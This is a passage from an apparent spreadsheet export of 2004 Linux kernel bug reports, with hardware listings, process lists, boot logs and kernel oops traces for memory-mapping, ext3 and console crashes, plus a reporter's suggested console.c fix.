non-prefetchable) 01:06.0 Ethernet controller: 3Com Corporation 3c905C-TX/TX-M [Tornado] (rev 74) Subsystem: 3Com Corporation 3C905C-TX Fast Etherlink for PC Management NIC Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (2500ns min, 2500ns max), Cache Line Size 10 Interrupt: pin A routed to IRQ 18 Region 0: I/O ports at dc00 [size=fd900000] Region 1: Memory at fda00000 (32-bit, non-prefetchable) [size=128] Expansion ROM at 00020000 [disabled] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=2 PME- 01:09.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5701 Gigabit Ethernet (rev 15) Subsystem: 3Com Corporation 3C996B-T 1000Base-T Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (16000ns min), Cache Line Size 10 Interrupt: pin A routed to IRQ 16 Region 0: Memory at fde00000 (64-bit, non-prefetchable) [size=fdd00000] Expansion ROM at 00010000 [disabled] Capabilities: [40] PCI-X non-bridge device. Command: DPERE- ERO- RBC=0 OST=0 Status: Bus=255 Dev=31 Func=1 64bit+ 133MHz+ SCD- USC-, DC=simple, DMMRBC=0, DMOST=0, DMCRS=0, RSCEM- Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data Capabilities: [58] Message Signalled Interrupts: 64bit+ Queue=0/3 Enable- Address: 2cea01a0883ebee0 Data: 1587 02:05.0 VGA compatible controller: ATI Technologies Inc: Unknown device 5834 (prog-if 00 [VGA]) Subsystem: Asustek Computer, Inc.: Unknown device 8107 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (2000ns min), Cache Line Size 10 Interrupt: pin A routed to IRQ 16 Region 0: Memory at e8000000 (32-bit, prefetchable) [size=fe300000] Region 1: I/O ports at e000 [size=256] Region 2: Memory at fe400000 (32-bit, non-prefetchable) [size=64K] Expansion ROM at 00020000 [disabled] Capabilities: [58] AGP version 3.0 Status: RQ=256 Iso- ArqSz=0 Cal=7 SBA+ ITACoh- GART64- HTrans- 64bit+ FW+ AGP3+ Rate=x4,x8 Command: RQ=1 ArqSz=0 Cal=0 SBA+ AGP- GART64- 64bit- FW- Rate=&lt;none&gt; Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Software Environment: root@tingui ~ # ps ax PID TTY STAT TIME COMMAND 1 ? S 0:00 init [5] 2 ? S 0:00 [migration/0] 3 ? SN 0:00 [ksoftirqd/0] 4 ? S 0:00 [migration/1] 5 ? SN 0:00 [ksoftirqd/1] 6 ? S&lt; 0:00 [events/0] 7 ? S&lt; 0:00 [events/1] 8 ? S&lt; 0:00 [khelper] 9 ? S&lt; 0:00 [kacpid] 10 ? S&lt; 0:00 [kblockd/0] 11 ? S&lt; 0:00 [kblockd/1] 12 ? S 0:00 [kirqd] 13 ? S 0:00 [pdflush] 14 ? S 0:00 [pdflush] 15 ? S 0:00 [kswapd0] 16 ? S&lt; 0:00 [aio/0] 17 ? S&lt; 0:00 [aio/1] 18 ? S 0:00 [kseriod] 19 ? S&lt; 0:00 [reiserfs/0] 20 ? S&lt; 0:00 [reiserfs/1] 99 ? Ss 0:00 syslogd -m 0 101 ? Ss 0:00 klogd 692 ? Ss 0:00 crond 703 ? Ss 0:00 cupsd 812 ? Ss 0:00 /usr/bin/kdm 831 ? S 0:43 /usr/X11R6/bin/X -dpi 100 -dpi 100 -dpi 100 -dpi 100 -auth /var/run/ 836 ? S 0:00 -:0 857 tty1 Ss+ 0:00 /sbin/agetty tty1 9600 858 tty2 Ss+ 0:00 /sbin/agetty tty2 9600 859 tty3 Ss+ 0:00 /sbin/agetty tty3 9600 860 tty4 Ss+ 0:00 /sbin/agetty tty4 9600 861 tty5 Ss+ 0:00 /sbin/agetty tty5 9600 862 tty6 Ss+ 0:00 /sbin/agetty tty6 9600 876 ? Ss 0:00 /usr/bin/lisa 887 ? S 0:00 icewm-session 896 ? SNs 0:00 icewmbg 897 ? Ss 0:00 icewm 898 ? Rs 0:00 icewmtray 899 ? Ss 0:00 /bin/sh /usr/bin/firefox 913 ? S 0:00 /bin/sh /usr/local/firefox/run-mozilla.sh /usr/local/firefox/firefox 918 ? S 0:50 /usr/local/firefox/firefox-bin 921 ? S 0:00 /usr/local/firefox/firefox-bin 922 ? S 0:00 /usr/local/firefox/firefox-bin 928 ? S 0:01 /usr/local/firefox/firefox-bin 932 ? Ss 0:00 xterm 933 pts/0 Ss 0:00 bash 936 pts/0 R+ 0:01 konsole 938 ? Ss 0:00 kdeinit: Running... 941 ? S 0:00 kdeinit: dcopserver --nosid --suicide 943 ? S 0:00 kdeinit: klauncher 945 ? S 0:00 kdeinit: kded 948 pts/1 Ss 0:00 /bin/bash 975 pts/1 R+ 0:00 ps ax Problem Description: Sep 19 17:29:41 tingui kernel: kernel BUG at mm/rmap.c:407! Sep 19 17:29:41 tingui kernel: invalid operand: 0000 [#3] Sep 19 17:29:41 tingui kernel: PREEMPT SMP Sep 19 17:29:41 tingui kernel: Modules linked in: isofs 8250 serial_core lp parport radeonfb tg3 3c59x snd_atiixp snd_ac97_codec ati_agp agpgart snd_pcm_oss snd_pcm snd_page_alloc snd_timer snd_mixer_oss snd soundcore Sep 19 17:29:41 tingui kernel: CPU: 0 Sep 19 17:29:41 tingui kernel: EIP: 0060:[page_remove_rmap+197/229] Not tainted Sep 19 17:29:41 tingui kernel: EFLAGS: 00010246 (2.6.8.1-7) Sep 19 17:29:41 tingui kernel: EIP is at page_remove_rmap+0xc5/0xe5 Sep 19 17:29:41 tingui kernel: eax: 00000000 ebx: c1cad0c0 ecx: fffff000 edx: 00000fe4 Sep 19 17:29:41 tingui kernel: esi: c0356fe4 edi: 65686361 ebp: c1cad0c0 esp: f1041dd0 Sep 19 17:29:41 tingui kernel: ds: 007b es: 007b ss: 0068 Sep 19 17:29:41 tingui kernel: Process sh (pid: 16861, threadinfo=f1041000 task=f55a0d30) Sep 19 17:29:41 tingui kernel: Stack: c1e11600 c014b7af c1cad0c0 00000007 f17f7800 ffff1000 c1006ac0 ffff0000 Sep 19 17:29:41 tingui kernel: 00000fe4 f17efbfc c0356fe4 f17efbfc f17f7800 bfff9728 c014ca20 f17f7800 Sep 19 17:29:41 tingui kernel: f4e2bdec bfff9728 c0356fe4 f17efbfc 65686361 00000000 f17f7800 f17f7820 Sep 19 17:29:41 tingui kernel: Call Trace: Sep 19 17:29:41 tingui kernel: [do_wp_page+749/1007] do_wp_page+0x2ed/0x3ef Sep 19 17:29:41 tingui kernel: [handle_mm_fault+540/570] handle_mm_fault+0x21c/0x23a Sep 19 17:29:41 tingui kernel: [do_page_fault+516/1322] do_page_fault+0x204/0x52a Sep 19 17:29:41 tingui kernel: [__alloc_pages+200/984] __alloc_pages+0xc8/0x3d8 Sep 19 17:29:41 tingui kernel: [__mmdrop+49/64] __mmdrop+0x31/0x40 Sep 19 17:29:41 tingui kernel: [finish_task_switch+108/148] finish_task_switch+0x6c/0x94 Sep 19 17:29:41 tingui kernel: [do_page_fault+0/1322] do_page_fault+0x0/0x52a Sep 19 17:29:41 tingui kernel: [error_code+45/56] error_code+0x2d/0x38 Sep 19 17:29:41 tingui kernel: [wait_task_zombie+471/515] wait_task_zombie+0x1d7/0x203 Sep 19 17:29:41 tingui kernel: [sys_wait4+288/640] sys_wait4+0x120/0x280 Sep 19 17:29:41 tingui kernel: [default_wake_function+0/18] default_wake_function+0x0/0x12 Sep 19 17:29:41 tingui kernel: [default_wake_function+0/18] default_wake_function+0x0/0x12 Sep 19 17:29:41 tingui kernel: [sys_rt_sigprocmask+162/306] sys_rt_sigprocmask+0xa2/0x132 Sep 19 17:29:41 tingui kernel: [sys_waitpid+39/43] sys_waitpid+0x27/0x2b Sep 19 17:29:41 tingui kernel: [syscall_call+7/11] syscall_call+0x7/0xb Sep 19 17:29:41 tingui kernel: Code: 0f 0b 97 01 cb 16 30 c0 e9 49 ff ff ff 5b e9 63 da 19 00 0f Sep 19 17:29:41 tingui kernel: note: sh[16861] exited with preempt_count 2</t>
  </si>
  <si>
    <t>oops in ext3_discard_reservation while running makedev</t>
  </si>
  <si>
    <t>2.6.9-rc2-mm1</t>
  </si>
  <si>
    <t>2004-09-20 12:43 UTC</t>
  </si>
  <si>
    <t>Laurent Riffard</t>
  </si>
  <si>
    <t>2004-09-23 15:15 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 10.0 Hardware Environment: AMD Athlon(TM) XP 1600+, 256 MB RAM Software Environment: Gnu C 3.3.2 Gnu make 3.80 binutils 2.14.90.0.7 util-linux 2.12 mount 2.12 module-init-tools 3.0 e2fsprogs 1.35 reiserfsprogs 3.6.17 reiser4progs 1.0.1 PPP 2.4.1 nfs-utils 1.0.6 Linux C Library 2.3.3 Dynamic linker (ldd) 2.3.3 Procps 3.1.15 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.2.1 Problem Description: As i deleted some device files in /dev while playing with udev, I tried to recreate them with makedev. I got a oops and I had to reboot using Alt-Syst-U/S/B. /dev is located on an ext3 filesystem. After reboot, I was able to run makedev on a reiserfs FS and then "cp -R" the directory to my ext3 FS. Steps to reproduce: run makedev on an ext3 filesytem.</t>
  </si>
  <si>
    <t>Console goes black under high load</t>
  </si>
  <si>
    <t>kernel 2.4.27</t>
  </si>
  <si>
    <t>2004-09-20 23:46 UTC</t>
  </si>
  <si>
    <t>2005-07-31 23:29 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat Linux 7.3 kernel 2.4.27 (upgraded) Hardware Environment: motherboard :Super Micro Computer Inc. cpu : Intel(R) Xeon(TM) CPU 2.40GHz stepping 05 X 2 Intel Corp. e7500 HI_B Virtual PCI-to-PCI Bridge Intel Corp. e7500 DRAM Controller Intel Corp. 82801BA/CA PCI Bridge etc. Software Environment: Red Hat Linux 7.3 with upgraded kernel 2.4.27 ltp-20030110-base.gz Problem Description: Stress the kernel 2.4.27 with high load. run about 10 following ltp test scripts: #./runalltests.sh 0 1 2 &gt;&gt;out.txt press ALT_Fx to switch console. console goes to black. can not resume. remote login with ssh, then dmesg: per-CPU timeslice cutoff: 1462.99 usecs. enabled ExtINT on CPU#0 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 Booting processor 1/1 eip 2000 Initializing CPU#1 masked ExtINT on CPU#1 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 Calibrating delay loop... 4797.23 BogoMIPS CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Physical Processor ID: 0 Intel machine check reporting enabled on CPU#1. CPU: After generic, caps: bfebfbff 00000000 00000000 00000000 CPU: Common caps: bfebfbff 00000000 00000000 00000000 CPU1: Intel(R) Xeon(TM) CPU 2.40GHz stepping 05 Booting processor 2/6 eip 2000 Initializing CPU#2 masked ExtINT on CPU#2 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 Calibrating delay loop... 4797.23 BogoMIPS CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Physical Processor ID: 3 Intel machine check reporting enabled on CPU#2. CPU: After generic, caps: bfebfbff 00000000 00000000 00000000 CPU: Common caps: bfebfbff 00000000 00000000 00000000 CPU2: Intel(R) Xeon(TM) CPU 2.40GHz stepping 05 Booting processor 3/7 eip 2000 Initializing CPU#3 masked ExtINT on CPU#3 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 Calibrating delay loop... 4797.23 BogoMIPS CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Physical Processor ID: 3 Intel machine check reporting enabled on CPU#3. CPU: After generic, caps: bfebfbff 00000000 00000000 00000000 CPU: Common caps: bfebfbff 00000000 00000000 00000000 CPU3: Intel(R) Xeon(TM) CPU 2.40GHz stepping 05 Total of 4 processors activated (19175.83 BogoMIPS). cpu_sibling_map[0] = 1 cpu_sibling_map[1] = 0 cpu_sibling_map[2] = 3 cpu_sibling_map[3] = 2 ENABLING IO-APIC IRQs Setting 2 in the phys_id_present_map ...changing IO-APIC physical APIC ID to 2 ... ok. Setting 3 in the phys_id_present_map ...changing IO-APIC physical APIC ID to 3 ... ok. Setting 4 in the phys_id_present_map ...changing IO-APIC physical APIC ID to 4 ... ok. init IO_APIC IRQs IO-APIC (apicid-pin) 2-0, 2-10, 2-11, 2-17, 2-20, 2-21, 2-22, 2-23, 3-0, 3-1, 3-2, 3-3, 3-6, 3-7, 3-8, 3-9, 3-10, 3-11, 3-12, 3-13, 3-14, 3-15, 3-16, 3-17, 3- 18, 3-19, 3-20, 3-21, 3-22, 3-23, 4-1, 4-2, 4-3, 4-4, 4-5, 4-8, 4-9, 4-10, 4- 11, 4-12, 4-13, 4-14, 4-15, 4-16, 4-17, 4-18, 4-19, 4-20, 4-21, 4-22, 4-23 not connected. ..TIMER: vector=0x31 pin1=2 pin2=0 number of MP IRQ sources: 23. number of IO-APIC #2 registers: 24. number of IO-APIC #3 registers: 24. number of IO-APIC #4 registers: 24. testing the IO APIC....................... IO APIC #2...... .... register #00: 02008000 ....... : physical APIC id: 02 ....... : Delivery Type: 1 ....... : LTS : 0 .... register #01: 00178020 ....... : max redirection entries: 0017 ....... : PRQ implemented: 1 ....... : IO APIC version: 0020 .... register #02: 00000000 ....... : arbitration: 00 .... register #03: 00000001 ....... : Boot DT : 1 .... IRQ redirection table: NR Log Phy Mask Trig IRR Pol Stat Dest Deli Vect: 00 000 00 1 0 0 0 0 0 0 00 01 00F 0F 0 0 0 0 0 1 1 39 02 00F 0F 0 0 0 0 0 1 1 31 03 00F 0F 0 0 0 0 0 1 1 41 04 00F 0F 0 0 0 0 0 1 1 49 05 00F 0F 0 0 0 0 0 1 1 51 06 00F 0F 0 0 0 0 0 1 1 59 07 00F 0F 0 0 0 0 0 1 1 61 08 00F 0F 0 0 0 0 0 1 1 69 09 00F 0F 0 0 0 0 0 1 1 71 0a 000 00 1 0 0 0 0 0 0 00 0b 000 00 1 0 0 0 0 0 0 00 0c 00F 0F 0 0 0 0 0 1 1 79 0d 00F 0F 0 0 0 0 0 1 1 81 0e 00F 0F 0 0 0 0 0 1 1 89 0f 00F 0F 0 0 0 0 0 1 1 91 10 00F 0F 1 1 0 1 0 1 1 99 11 000 00 1 0 0 0 0 0 0 00 12 00F 0F 1 1 0 1 0 1 1 A1 13 00F 0F 1 1 0 1 0 1 1 A9 14 000 00 1 0 0 0 0 0 0 00 15 000 00 1 0 0 0 0 0 0 00 16 000 00 1 0 0 0 0 0 0 00 17 000 00 1 0 0 0 0 0 0 00 IO APIC #3...... .... register #00: 03000000 ....... : physical APIC id: 03 ....... : Delivery Type: 0 ....... : LTS : 0 .... register #01: 00178020 ....... : max redirection entries: 0017 ....... : PRQ implemented: 1 ....... : IO APIC version: 0020 .... register #02: 03000000 ....... : arbitration: 03 .... register #03: 00000001 ....... : Boot DT : 1 .... IRQ redirection table: NR Log Phy Mask Trig IRR Pol Stat Dest Deli Vect: 00 000 00 1 0 0 0 0 0 0 00 01 000 00 1 0 0 0 0 0 0 00 02 000 00 1 0 0 0 0 0 0 00 03 000 00 1 0 0 0 0 0 0 00 04 00F 0F 1 1 0 1 0 1 1 B1 05 00F 0F 1 1 0 1 0 1 1 B9 06 000 00 1 0 0 0 0 0 0 00 07 000 00 1 0 0 0 0 0 0 00 08 000 00 1 0 0 0 0 0 0 00 09 000 00 1 0 0 0 0 0 0 00 0a 000 00 1 0 0 0 0 0 0 00 0b 000 00 1 0 0 0 0 0 0 00 0c 000 00 1 0 0 0 0 0 0 00 0d 000 00 1 0 0 0 0 0 0 00 0e 000 00 1 0 0 0 0 0 0 00 0f 000 00 1 0 0 0 0 0 0 00 10 000 00 1 0 0 0 0 0 0 00 11 000 00 1 0 0 0 0 0 0 00 12 000 00 1 0 0 0 0 0 0 00 13 000 00 1 0 0 0 0 0 0 00 14 000 00 1 0 0 0 0 0 0 00 15 000 00 1 0 0 0 0 0 0 00 16 000 00 1 0 0 0 0 0 0 00 17 000 00 1 0 0 0 0 0 0 00 IO APIC #4...... .... register #00: 04000000 ....... : physical APIC id: 04 ....... : Delivery Type: 0 ....... : LTS : 0 .... register #01: 00178020 ....... : max redirection entries: 0017 ....... : PRQ implemented: 1 ....... : IO APIC version: 0020 .... register #02: 04000000 ....... : arbitration: 04 .... register #03: 00000001 ....... : Boot DT : 1 .... IRQ redirection table: NR Log Phy Mask Trig IRR Pol Stat Dest Deli Vect: 00 00F 0F 1 1 0 1 0 1 1 C1 01 000 00 1 0 0 0 0 0 0 00 02 000 00 1 0 0 0 0 0 0 00 03 000 00 1 0 0 0 0 0 0 00 04 000 00 1 0 0 0 0 0 0 00 05 000 00 1 0 0 0 0 0 0 00 06 00F 0F 1 1 0 1 0 1 1 C9 07 00F 0F 1 1 0 1 0 1 1 D1 08 000 00 1 0 0 0 0 0 0 00 09 000 00 1 0 0 0 0 0 0 00 0a 000 00 1 0 0 0 0 0 0 00 0b 000 00 1 0 0 0 0 0 0 00 0c 000 00 1 0 0 0 0 0 0 00 0d 000 00 1 0 0 0 0 0 0 00 0e 000 00 1 0 0 0 0 0 0 00 0f 000 00 1 0 0 0 0 0 0 00 10 000 00 1 0 0 0 0 0 0 00 11 000 00 1 0 0 0 0 0 0 00 12 000 00 1 0 0 0 0 0 0 00 13 000 00 1 0 0 0 0 0 0 00 14 000 00 1 0 0 0 0 0 0 00 15 000 00 1 0 0 0 0 0 0 00 16 000 00 1 0 0 0 0 0 0 00 17 000 00 1 0 0 0 0 0 0 00 IRQ to pin mappings: IRQ0 -&gt; 0:2 IRQ1 -&gt; 0:1 IRQ3 -&gt; 0:3 IRQ4 -&gt; 0:4 IRQ5 -&gt; 0:5 IRQ6 -&gt; 0:6 IRQ7 -&gt; 0:7 IRQ8 -&gt; 0:8 IRQ9 -&gt; 0:9 IRQ12 -&gt; 0:12 IRQ13 -&gt; 0:13 IRQ14 -&gt; 0:14 IRQ15 -&gt; 0:15 IRQ16 -&gt; 0:16 IRQ18 -&gt; 0:18 IRQ19 -&gt; 0:19 IRQ28 -&gt; 1:4 IRQ29 -&gt; 1:5 IRQ48 -&gt; 2:0 IRQ54 -&gt; 2:6 IRQ55 -&gt; 2:7 .................................... done. Using local APIC timer interrupts. calibrating APIC timer ... ..... CPU clock speed is 2399.3562 MHz. ..... host bus clock speed is 133.2974 MHz. cpu: 0, clocks: 1332974, slice: 266594 CPU0&lt;T0:1332960,T1:1066352,D:14,S:266594,C:1332974&gt; cpu: 1, clocks: 1332974, slice: 266594 cpu: 3, clocks: 1332974, slice: 266594 cpu: 2, clocks: 1332974, slice: 266594 CPU1&lt;T0:1332960,T1:799760,D:12,S:266594,C:1332974&gt; CPU2&lt;T0:1332960,T1:533168,D:10,S:266594,C:1332974&gt; CPU3&lt;T0:1332960,T1:266576,D:8,S:266594,C:1332974&gt; checking TSC synchronization across CPUs: passed. Waiting on wait_init_idle (map = 0xe) All processors have done init_idle PCI: PCI BIOS revision 2.10 entry at 0xfd8c5, last bus=4 PCI: Using configuration type 1 PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) PCI: Ignoring BAR0-3 of IDE controller 00:1f.1 Transparent bridge - Intel Corp. 82801BA/CA/DB/EB PCI Bridge PCI: Discovered primary peer bus 10 [IRQ] PCI: Discovered primary peer bus 11 [IRQ] PCI: Discovered primary peer bus 12 [IRQ] PCI: Using IRQ router PIIX/ICH [8086/2480] at 00:1f.0 PCI-&gt;APIC IRQ transform: (B0,I29,P0) -&gt; 16 PCI-&gt;APIC IRQ transform: (B0,I29,P1) -&gt; 19 PCI-&gt;APIC IRQ transform: (B0,I29,P2) -&gt; 18 PCI-&gt;APIC IRQ transform: (B2,I1,P0) -&gt; 48 PCI-&gt;APIC IRQ transform: (B2,I3,P0) -&gt; 54 PCI-&gt;APIC IRQ transform: (B2,I3,P1) -&gt; 55 PCI-&gt;APIC IRQ transform: (B3,I2,P0) -&gt; 28 PCI-&gt;APIC IRQ transform: (B3,I2,P1) -&gt; 29 PCI-&gt;APIC IRQ transform: (B4,I1,P0) -&gt; 16 isapnp: Scanning for PnP cards... isapnp: No Plug &amp; Play device found Linux NET4.0 for Linux 2.4 Based upon Swansea University Computer Society NET3.039 Initializing RT netlink socket IA-32 Microcode Update Driver: v1.14 &lt;tigran@veritas.com&gt; Starting kswapd allocated 32 pages and 32 bhs reserved for the highmem bounces Journalled Block Device driver loaded Installing knfsd (copyright (C) 1996 okir@monad.swb.de). pty: 256 Unix98 ptys configured Serial driver version 5.05c (2001-07-08) with MANY_PORTS SHARE_IRQ SERIAL_PCI ISAPNP enabled ttyS00 at 0x03f8 (irq = 4) is a 16550A ttyS01 at 0x02f8 (irq = 3) is a 16550A Real Time Clock Driver v1.10f Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 Intel(R) PRO/1000 Network Driver - version 5.2.52-k3 Copyright (c) 1999-2004 Intel Corporation. e1000: eth0: e1000_probe: Intel(R) PRO/1000 Network Connection e1000: eth1: e1000_probe: Intel(R) PRO/1000 Network Connection Intel(R) PRO/100 Network Driver - version 2.3.43-k1 Copyright (c) 2004 Intel Corporation e100: selftest OK. e100: eth2: Intel(R) PRO/100 Network Connection Hardware receive checksums enabled cpu cycle saver enabled Linux agpgart interface v0.99 (c) Jeff Hartmann agpgart: Maximum main memory to use for agp memory: 3932M agpgart: no supported devices found. [drm] Initialized tdfx 1.0.0 20010216 on minor 0 [drm] Initialized radeon 1.7.0 20020828 on minor 1 [drm:drm_init] *ERROR* Cannot initialize the agpgart module. Uniform Multi-Platform E-IDE driver Revision: 7.00beta4-2.4 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ICH3: IDE controller at PCI slot 00:1f.1 ICH3: chipset revision 2 ICH3: not 100% native mode: will probe irqs later ide0: BM-DMA at 0x2060-0x2067, BIOS settings: hda:pio, hdb:pio ide1: BM-DMA at 0x2068-0x206f, BIOS settings: hdc:pio, hdd:pio hda: CD-224E, ATAPI CD/DVD-ROM drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 hda: attached ide-cdrom driver. hda: ATAPI 24X CD-ROM drive, 128kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.12 SCSI subsystem driver Revision: 1.00 scsi0 : Adaptec AIC79XX PCI-X SCSI HBA DRIVER, Rev 1.3.10 &lt;Adaptec AIC7902 Ultra320 SCSI adapter&gt; aic7902: Ultra320 Wide Channel A, SCSI Id=7, PCI-X 101-133Mhz, 512 SCBs scsi1 : Adaptec AIC79XX PCI-X SCSI HBA DRIVER, Rev 1.3.10 &lt;Adaptec AIC7902 Ultra320 SCSI adapter&gt; aic7902: Ultra320 Wide Channel B, SCSI Id=7, PCI-X 101-133Mhz, 512 SCBs (scsi0:A:0): 320.000MB/s transfers (160.000MHz DT|IU|RTI|QAS, 16bit) (scsi0:A:1): 320.000MB/s transfers (160.000MHz DT|IU|RTI|QAS, 16bit) Vendor: SEAGATE Model: ST373307LC Rev: 0004 Type: Direct-Access ANSI SCSI revision: 03 Vendor: SEAGATE Model: ST373307LC Rev: 0004 Type: Direct-Access ANSI SCSI revision: 03 scsi0:A:0:0: Tagged Queuing enabled. Depth 32 scsi0:A:1:0: Tagged Queuing enabled. Depth 32 Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 Attached scsi disk sdb at scsi0, channel 0, id 1, lun 0 SCSI device sda: 143374744 512-byte hdwr sectors (73408 MB) Partition check: sda: sda1 sda2 sda3 SCSI device sdb: 143374744 512-byte hdwr sectors (73408 MB) sdb: sdb1 sdb2 sdb3 es1371: version v0.32 time 19:04:36 Sep 16 2004 Linux Kernel Card Services 3.1.22 options: [pci] [cardbus] [pm] usb.c: registered new driver hub host/uhci.c: USB Universal Host Controller Interface driver v1.1 PCI: Setting latency timer of device 00:1d.0 to 64 host/uhci.c: USB UHCI at I/O 0x2000, IRQ 16 usb.c: new USB bus registered, assigned bus number 1 hub.c: USB hub found hub.c: 2 ports detected PCI: Setting latency timer of device 00:1d.1 to 64 host/uhci.c: USB UHCI at I/O 0x2020, IRQ 19 usb.c: new USB bus registered, assigned bus number 2 hub.c: USB hub found hub.c: 2 ports detected PCI: Setting latency timer of device 00:1d.2 to 64 host/uhci.c: USB UHCI at I/O 0x2040, IRQ 18 usb.c: new USB bus registered, assigned bus number 3 hub.c: USB hub found hub.c: 2 ports detected Initializing USB Mass Storage driver... usb.c: registered new driver usb-storage USB Mass Storage support registered. NET4: Linux TCP/IP 1.0 for NET4.0 IP Protocols: ICMP, UDP, TCP, IGMP IP: routing cache hash table of 32768 buckets, 256Kbytes TCP: Hash tables configured (established 262144 bind 65536) NET4: Unix domain sockets 1.0/SMP for Linux NET4.0. ds: no socket drivers loaded! kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Freeing unused kernel memory: 132k freed Adding Swap: 2040244k swap-space (priority -1) EXT3 FS 2.4-0.9.19, 19 August 2002 on sd(8,3), internal journal kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.19, 19 August 2002 on sd(8,1), internal journal EXT3-fs: mounted filesystem with ordered data mode. e1000: eth1: e1000_watchdog: NIC Link is Up 100 Mbps Half Duplex init_module: self-referential dependency in mod-&gt;deps. Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: c01b00a0 *pde = 00000000 Oops: 0000 CPU: 1 EIP: 0010:[&lt;c01b00a0&gt;] Tainted: PF EFLAGS: 00010246 eax: 00000000 ebx: 00000000 ecx: 00000000 edx: 00000080 esi: f6dbf000 edi: f6dbf000 ebp: f6dbf000 esp: c4061dd8 ds: 0018 es: 0018 ss: 0018 Process keventd (pid: 2, stackpage=c4061000) Stack: 000000ff 00000001 c4061e23 00000000 00000000 00000000 00000003 ffffffff 00000000 f730a480 f6dbf000 f6dbf000 f6dbf000 c01b0c2d f6dbf000 00000000 c4061e23 00000001 0a00000c c01a37be f6dbf000 0000000a c01ad30a f725bc00 Call Trace: [&lt;c01b0c2d&gt;] [&lt;c01a37be&gt;] [&lt;c01ad30a&gt;] [&lt;c01a437f&gt;] [&lt;c0122b0a&gt;] [&lt;c01146d5&gt;] [&lt;c0122b50&gt;] [&lt;c0122b50&gt;] [&lt;c01146d5&gt;] [&lt;c01a2e32&gt;] [&lt;c011f6fd&gt;] [&lt;c0127c55&gt;] [&lt;c0127b10&gt;] [&lt;c0105000&gt;] [&lt;c0105696&gt;] [&lt;c0127b10&gt;] Code: 8b 01 89 44 24 18 50 e8 94 d4 ff ff 5d 85 c0 75 2f 8b 3d c0 Steps to reproduce: code need to fix: Console.c : static int do_con_write(struct tty_struct * tty, int from_user, const unsigned char *buf, int count) { #ifdef VT_BUF_VRAM_ONLY #define FLUSH do { } while(0); #else #define FLUSH if (draw_x &gt;= 0) { \ sw-&gt;con_putcs(vc_cons[currcons].d, (u16 *)draw_from, (u16 *)draw_to- (u16 *)draw_from, y, draw_x); \ draw_x = -1; \ } #endif int c, tc, ok, n = 0, draw_x = -1; unsigned int currcons; unsigned long draw_from = 0, draw_to = 0; struct vt_struct *vt = (struct vt_struct *)tty-&gt;driver_data; u16 himask, charmask; const unsigned char *orig_buf = NULL; int orig_count; if (in_interrupt()) return count; currcons = vt-&gt;vc_num; //not if the vt is NULL. then the driver crashed.</t>
  </si>
  <si>
    <t>auto reboot while booting w/ SMP when HT enabled on dell dimension 4600i</t>
  </si>
  <si>
    <t>2004-09-22 12:50 UTC</t>
  </si>
  <si>
    <t>Andy Martin</t>
  </si>
  <si>
    <t>2005-04-19 16:09 UTC</t>
  </si>
  <si>
    <t>Distribution: debian gnu/linux `sarge' Hardware Environment: dell dimension 4600i w/ latest BIOS (ver. A10). P4 2.8 GHz w/ HT enabled nvidia AGP graphics add-on card in place of onboard video. output of lspci: 0000:00:00.0 Host bridge: Intel Corp. 82865G/PE/P DRAM Controller/Host-Hub Interface (rev 02) 0000:00:01.0 PCI bridge: Intel Corp. 82865G/PE/P PCI to AGP Controller (rev 02) 0000:00:1d.0 USB Controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) USB UHCI #1 (rev 02) 0000:00:1d.1 USB Controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) USB UHCI #2 (rev 02) 0000:00:1d.2 USB Controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) USB UHCI #3 (rev 02) 0000:00:1d.3 USB Controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) USB UHCI #4 (rev 02) 0000:00:1d.7 USB Controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) USB2 EHCI Controller (rev 02) 0000:00:1e.0 PCI 